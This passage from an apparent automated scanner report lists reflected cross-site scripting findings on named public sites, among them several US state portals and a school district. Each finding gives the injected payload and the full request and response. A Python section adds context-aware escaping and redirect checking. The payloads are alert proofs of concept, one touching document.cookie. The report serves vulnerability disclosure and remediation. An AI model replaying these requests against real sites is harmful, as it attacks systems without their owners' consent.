<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<a href="/ctportal/site/default.asp?d3f9f"><script>alert(1)</script>e7695281779=1&ctportalNav=|27188|">
...[SNIP]...

3.95. http://www.ct.gov/ctportal/taxonomy/taxonomy.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /ctportal/taxonomy/taxonomy.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d83"><script>alert(1)</script>6f12826e6b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ctportal/taxonomy/taxonomy.asp?56d83"><script>alert(1)</script>6f12826e6b0=1 HTTP/1.1
Host: www.ct.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ctportalNav%5FGID=; ctportalNav=; __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; __utmc=64328189; __utmb=64328189.3.10.1304117373;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:31:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 28086
Content-Type: text/html
Set-Cookie: ctportalPNavCtr%5FGID=; path=/ctportal
Set-Cookie: ctportalPNavCtr=; path=/ctportal
Set-Cookie: ctportal=SA=False&EA=&SSL=False&F=CE83CBC6&NB=False&rn=&II=&ILO=False&FN=Guest&TU=CF83CBC7&CA=CF83CBC7&TC=06108&ln=&AN=&AG=&Q=CF83CBC7&PGT=&UA=Guest&AA=False&LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930; domain=www.ct.gov; path=/ctportal
Set-Cookie: ctportalNav=; path=/ctportal
Set-Cookie: ctportalNav%5FGID=; path=/ctportal
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<a href="/ctportal/taxonomy/taxonomy.asp?56d83"><script>alert(1)</script>6f12826e6b0=1&ctportalNav=|27188|">
...[SNIP]...

3.96. http://www.delmar.k12.de.us/education/district/district.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.delmar.k12.de.us
Path:   /education/district/district.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 769e9<script>alert(1)</script>f1110d4158c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education769e9<script>alert(1)</script>f1110d4158c/district/district.php HTTP/1.1
Host: www.delmar.k12.de.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:31:51 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=c840edd82e80bb1fc6d896bf4e8a22c7; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2817
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">education769e9<script>alert(1)</script>f1110d4158c/district/district.php</div>
...[SNIP]...

3.97. http://www.delmar.k12.de.us/education/district/district.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.delmar.k12.de.us
Path:   /education/district/district.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3626e<script>alert(1)</script>d8af3be9d26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/district3626e<script>alert(1)</script>d8af3be9d26/district.php HTTP/1.1
Host: www.delmar.k12.de.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:31:53 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=885b169a70c688094ff307083c553ed4; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2817
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">education/district3626e<script>alert(1)</script>d8af3be9d26/district.php</div>
...[SNIP]...

3.98. http://www.delmar.k12.de.us/education/district/district.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.delmar.k12.de.us
Path:   /education/district/district.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5a6ad<script>alert(1)</script>f2351919eff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/district/district.php5a6ad<script>alert(1)</script>f2351919eff HTTP/1.1
Host: www.delmar.k12.de.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:31:55 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=2c5421dba8c5188436ee5c8fdfde2216; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2817
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">education/district/district.php5a6ad<script>alert(1)</script>f2351919eff</div>
...[SNIP]...

3.99. http://www.delmar.k12.de.us/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.delmar.k12.de.us
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7a4d7<script>alert(1)</script>8cd52fd3ee6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7a4d7<script>alert(1)</script>8cd52fd3ee6 HTTP/1.1
Host: www.delmar.k12.de.us
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e7842bb204bff7ce048b9362b6fed952

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 15:09:51 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-encoding
Connection: close
Content-Type: text/html
Content-Length: 2797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">favicon.ico7a4d7<script>alert(1)</script>8cd52fd3ee6</div>
...[SNIP]...

3.100. http://www.georgia.gov/external/ [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.georgia.gov
Path:   /external/

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 15fa3<script>alert(1)</script>1b342e50020 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external/?url=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=1215fa3<script>alert(1)</script>1b342e50020 HTTP/1.1
Host: www.georgia.gov
Proxy-Connection: keep-alive
Referer: http://ga.gov/00/channel_title/0,2094,4802_4969,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:39:55 GMT
Server: Apache/1.3.29 (Unix)
Expires: Tue, 20 Jun 1995 04:13:09 GMT
Set-cookie: JSESSIONID=F468E5F01AD48C655A525E40BD4B07CE;Path=/
Set-Cookie: vgnvisitor=2w45tg008rU00001jrJqmY6Edd; path=/; expires=Saturday, 06-Sep-2014 23:50:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1227


<html>
<head>
<title>Redirecting...</title>
<link rel="stylesheet" type="text/css" href="/gta/mcm/files/cda.css">


<script src="http://www.google-analytics.com/urchin.js" type="text/java
...[SNIP]...
</script>1b342e50020">http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=1215fa3<script>alert(1)</script>1b342e50020</a>
...[SNIP]...

3.101. http://www.georgia.gov/external/ [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.georgia.gov
Path:   /external/

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23c8f'%3balert(1)//5a4f221ee04 was submitted in the url parameter. This input was echoed as 23c8f';alert(1)//5a4f221ee04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external/?url=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=1223c8f'%3balert(1)//5a4f221ee04 HTTP/1.1
Host: www.georgia.gov
Proxy-Connection: keep-alive
Referer: http://ga.gov/00/channel_title/0,2094,4802_4969,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:12 GMT
Server: Apache/1.3.29 (Unix)
Expires: Tue, 20 Jun 1995 04:13:09 GMT
Set-cookie: JSESSIONID=1A254C3FA89BB341E96C5F4021B385AE;Path=/
Set-Cookie: vgnvisitor=2w45tw0020Y00001jrJrRcBCM6; path=/; expires=Saturday, 06-Sep-2014 23:50:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1175


<html>
<head>
<title>Redirecting...</title>
<link rel="stylesheet" type="text/css" href="/gta/mcm/files/cda.css">


<script src="http://www.google-analytics.com/urchin.js" type="text/java
...[SNIP]...
<script type="text/javascript">
location.replace('http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=1223c8f';alert(1)//5a4f221ee04');
   </script>
...[SNIP]...

3.102. http://www.georgia.gov/external/ [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.georgia.gov
Path:   /external/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d65df"><script>alert(1)</script>54c79dcd06 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external/?url=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=12d65df"><script>alert(1)</script>54c79dcd06 HTTP/1.1
Host: www.georgia.gov
Proxy-Connection: keep-alive
Referer: http://ga.gov/00/channel_title/0,2094,4802_4969,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:32:38 GMT
Server: Apache/1.3.29 (Unix)
Expires: Tue, 20 Jun 1995 04:13:09 GMT
Set-cookie: JSESSIONID=941727D8F152A95C1EADB9D728309C3A;Path=/
Set-Cookie: vgnvisitor=2w45tM000ZY00001jrJoFGME3a; path=/; expires=Saturday, 06-Sep-2014 23:50:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1231


<html>
<head>
<title>Redirecting...</title>
<link rel="stylesheet" type="text/css" href="/gta/mcm/files/cda.css">


<script src="http://www.google-analytics.com/urchin.js" type="text/java
...[SNIP]...
<meta http-equiv="refresh" content="0; URL=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=12d65df"><script>alert(1)</script>54c79dcd06">
...[SNIP]...
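
Findings 3.100 to 3.102 show the same url parameter reaching three different sinks in one response: the anchor text (3.100), a single-quoted JavaScript string inside location.replace (3.101) and the double-quoted content attribute of a meta refresh (3.102). Each sink needs its own output encoding, and the redirect target is additionally a URL sink that no encoder can protect, since a javascript: URL is a perfectly well-formed string. The Python below is an added example written for this report, not code from georgia.gov: the three payloads and the base URL are copied from the findings above, while the allow-list, the page template and the helper names are assumptions made for the example. It goes slightly beyond the recorded cases by also rejecting off-site and non-http targets.

```python
import html
import json
from typing import Optional
from urllib.parse import urlsplit

# Payloads recorded in findings 3.100-3.102; BASE is the redirect target seen in those
# requests. ALLOWED_REDIRECT_HOSTS and the page template are assumptions for this example.
BASE = 'http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=12'
PAYLOAD_TEXT = '15fa3<script>alert(1)</script>1b342e50020'     # 3.100: text between tags
PAYLOAD_JS = "23c8f';alert(1)//5a4f221ee04"                   # 3.101: single-quoted JS string
PAYLOAD_ATTR = 'd65df"><script>alert(1)</script>54c79dcd06'   # 3.102: double-quoted attribute

ALLOWED_REDIRECT_HOSTS = {'georgiawildlife.dnr.state.ga.us'}  # hypothetical allow-list


def enc_html_text(value: str) -> str:
    """Data placed between tags: escape & < > " ' (html.escape with quote=True does all five)."""
    return html.escape(value, quote=True)


def enc_html_attr(value: str) -> str:
    """Data placed inside a *quoted* attribute value. The same escaping is enough, but only
    if the template really quotes the attribute; an unquoted attribute stays injectable."""
    return html.escape(value, quote=True)


def enc_js_string(value: str) -> str:
    """Data placed inside a JavaScript string literal in a <script> block. json.dumps gives a
    double-quoted literal with quotes, backslashes and control characters escaped; < > & are
    hex-escaped on top so a value containing '</script>' cannot close the block, and the
    default ensure_ascii turns U+2028/U+2029 (line terminators to older engines) into \\u escapes."""
    literal = json.dumps(value)
    return literal.replace('<', '\\u003c').replace('>', '\\u003e').replace('&', '\\u0026')


def safe_redirect_target(url: str) -> Optional[str]:
    """A URL sink (meta refresh, location.replace) needs validation, not encoding:
    'javascript:alert(1)' survives every encoder above unchanged and still runs when followed."""
    parts = urlsplit(url)
    if parts.scheme not in ('http', 'https'):
        return None
    if parts.hostname not in ALLOWED_REDIRECT_HOSTS:
        return None
    return url


def render_redirect_page(url: str) -> str:
    """Hardened rendering of the /external/ page shape: one parameter, four sinks."""
    target = safe_redirect_target(url)
    if target is None:
        return '<html><body><p>Invalid redirect target.</p></body></html>'
    return (
        '<html><head><title>Redirecting...</title>'
        f'<meta http-equiv="refresh" content="0; URL={enc_html_attr(target)}">'
        f'<script type="text/javascript">location.replace({enc_js_string(target)});</script>'
        '</head><body>'
        f'<a href="{enc_html_attr(target)}">{enc_html_text(target)}</a>'
        '</body></html>'
    )


def decode_js_target(page: str) -> str:
    """Pull the literal back out of location.replace(...) and decode it, to show the value
    survives the encoding intact."""
    start = page.index('location.replace(') + len('location.replace(')
    end = page.index(');</script>', start)
    return json.loads(page[start:end])


if __name__ == '__main__':
    for payload in (PAYLOAD_TEXT, PAYLOAD_JS, PAYLOAD_ATTR):
        print(render_redirect_page(BASE + payload))
    print(render_redirect_page('javascript:alert(1)'))
```

Running the block prints the hardened page for each recorded payload: the reflected values are preserved (decode_js_target recovers them from the script block) but can no longer leave their text, attribute or string context, and a javascript: or off-site target is refused before it reaches any sink. The point of the three separate encoders is that the context decides the encoding; one "sanitize" pass applied to the parameter on input would have to guess which of the four sinks it is protecting.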

3.103. http://www.healthynh.com/index-fhc.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthynh.com
Path:   /index-fhc.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8336"><script>alert(1)</script>2bdf6318525 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index-fhc.php?b8336"><script>alert(1)</script>2bdf6318525=1 HTTP/1.1
Host: www.healthynh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:14 GMT
Server: L1c
Set-Cookie: PHPSESSID=a3e0be6f57b47037047e77111e497453; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 17349

<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
   <title>Foundation for Healthy Communities</title>
   <link rel="stylesheet" href="/inc/default.css.phpi" type="
...[SNIP]...
<a href="/index-fhc.php?b8336"><script>alert(1)</script>2bdf6318525=1&printfriendly=yes" target="_blank">
...[SNIP]...

3.104. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kodakgallery.com
Path:   /gallery/lp/2010/visit_florida/vacation_photos.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload e81c7*/alert(1)//4c687dfaa6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(1)//4c687dfaa6f=1 HTTP/1.1
Host: www.kodakgallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Expires: -1
Set-Cookie: JSESSIONID=C55D22317F997F3DE5A33917B985534E.ecom203_main; Domain=kodakgallery.com; Path=/
Set-Cookie: sourceId=500019816903; Domain=kodakgallery.com; Expires=Mon, 30-May-2011 12:39:19 GMT; Path=/
Set-Cookie: sourceId=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: DYN_EMAIL=anon_mem1215348012@kodakgallery.com; Domain=kodakgallery.com; Path=/
Set-Cookie: bookStartTest1=control; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:19 GMT; Path=/
Set-Cookie: bookUnlockedLayoutTest=lockedLayout; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:19 GMT; Path=/
Set-Cookie: ft_80002=none; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:19 GMT; Path=/
Set-Cookie: abTest=bookStartTest1-bookUnlockedLayoutTest-ft_80002-; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:19 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sat, 30 Apr 2011 12:39:19 GMT
Server: ecom203
Connection: close
Content-Length: 38209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equ
...[SNIP]...
'
   }
       return str.substring(str.lastIndexOf(slash) + 1, str.lastIndexOf('.'))
   }
   /* console.log('getRequestURI(): /gallery/lp/2010/visit_florida/vacation_photos.jsp');
   console.log('getQueryString(): e81c7*/alert(1)//4c687dfaa6f=1');
   console.log('pageName: null'); */
</script>
...[SNIP]...

3.105. http://www.ms.gov/ms_sub_template.jsp [Category_ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ms.gov
Path:   /ms_sub_template.jsp

Issue detail

The value of the Category_ID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e740"><img%20src%3da%20onerror%3dalert(1)>a3b5706621b was submitted in the Category_ID parameter. This input was echoed as 6e740"><img src=a onerror=alert(1)>a3b5706621b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ms_sub_template.jsp?Category_ID=46e740"><img%20src%3da%20onerror%3dalert(1)>a3b5706621b HTTP/1.1
Host: www.ms.gov
Proxy-Connection: keep-alive
Referer: http://www.ms.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000IR5EHNxWBpUhViAYMe_JD1G:-1; __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; __utmc=63443123; __utmb=63443123.1.10.1304126862

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 01:34:39 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=A40B0FC60A0C1A16441A441A94429A94
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHUG1V9zgQBAvmGanPPuAtYZWQHtAYSklg01qYE0ZX2Lg7mlNPl70nzYjDbgcmgGlwN5cwgPMSSUR4pTaqrepuY13rHldvZD7gDNVAx04SG1D
Content-Length: 18892

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html>
<head>
   <title> | The Official State Web Site of Mississippi</title>
   <link href="ms02.css" rel="stylesheet
...[SNIP]...
<img src="images/hdr_46e740"><img src=a onerror=alert(1)>a3b5706621b.gif" width="253" height="21" border="0" alt="">
...[SNIP]...

3.106. http://www.nv.gov/workarea/csslib/ektronCss.ashx [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /workarea/csslib/ektronCss.ashx

Issue detail

The value of the id request parameter is copied unmodified into the response body. The payload 6bd35<script>alert(1)</script>2680ccebefc was submitted in the id parameter and was echoed, unchanged, inside a CSS block comment (the /* id: ... */ line below). Note that the response is served as Content-Type: text/css, not HTML: a browser fetching this URL, whether directly or through a <link> element, parses the body as a stylesheet, so the reflected <script> element is never executed as written. The reflection itself is confirmed; the High / Certain rating, however, presumes an HTML rendering context that this response does not provide, and exploitability remains to be shown.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/csslib/ektronCss.ashx?id=EktronModalCss+EktronThickBoxCss+EktronBubbleCss6bd35<script>alert(1)</script>2680ccebefc HTTP/1.1
Host: www.nv.gov
Proxy-Connection: keep-alive
Referer: http://www.nv.gov/NV_default4.aspx?id=345
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; EktGUID=3242dd35-5d85-4b04-841c-e344a6607f3b; EkAnalytics=newuser; ASP.NET_SessionId=hkc1c0jbt34kty550xanvxr0

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Type: text/css; charset=utf-8
Expires: Sun, 29 Apr 2012 11:24:54 GMT
Last-Modified: Sat, 30 Apr 2011 11:24:54 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:24:53 GMT
Content-Length: 11064

.ektronWindow{display:none;position:fixed!important;top:25%;left:50%;margin-left:-20em;width:40em;background-color:#fff;color:#333;border:1px solid #525252;padding:1em;}.ektronModalOverlay{background-
...[SNIP]...
Area/images/application/macFFBgHack.gif') repeat;}

/* ############################################################# */
/* ektron registered stylesheet: css file not found */
/* id: EktronBubbleCss6bd35<script>alert(1)</script>2680ccebefc */
/* path:
/* ############################################################# */


3.107. http://www.nv.gov/workarea/java/ektronJs.ashx [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nv.gov
Path:   /workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied unmodified into the response body. The payload dee3d<script>alert(1)</script>8660aed3ca9 was submitted in the id parameter and was echoed, unchanged, on a // line comment (the //id: line below) of a response served as Content-Type: application/javascript. Loaded through <script src>, everything after // up to the end of the line is ignored, so the reflected <script> element does nothing; fetched directly, the body is not parsed as HTML. As with 3.106, the reflection is confirmed but script execution is not demonstrated by this response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/java/ektronJs.ashx?id=EktronWebToolBarJSdee3d<script>alert(1)</script>8660aed3ca9 HTTP/1.1
Host: www.nv.gov
Proxy-Connection: keep-alive
Referer: http://www.nv.gov/NV_default4.aspx?id=345
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.nv.gov&SiteLanguage=1033; EktGUID=3242dd35-5d85-4b04-841c-e344a6607f3b; EkAnalytics=newuser; ASP.NET_SessionId=hkc1c0jbt34kty550xanvxr0

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Type: application/javascript; charset=utf-8
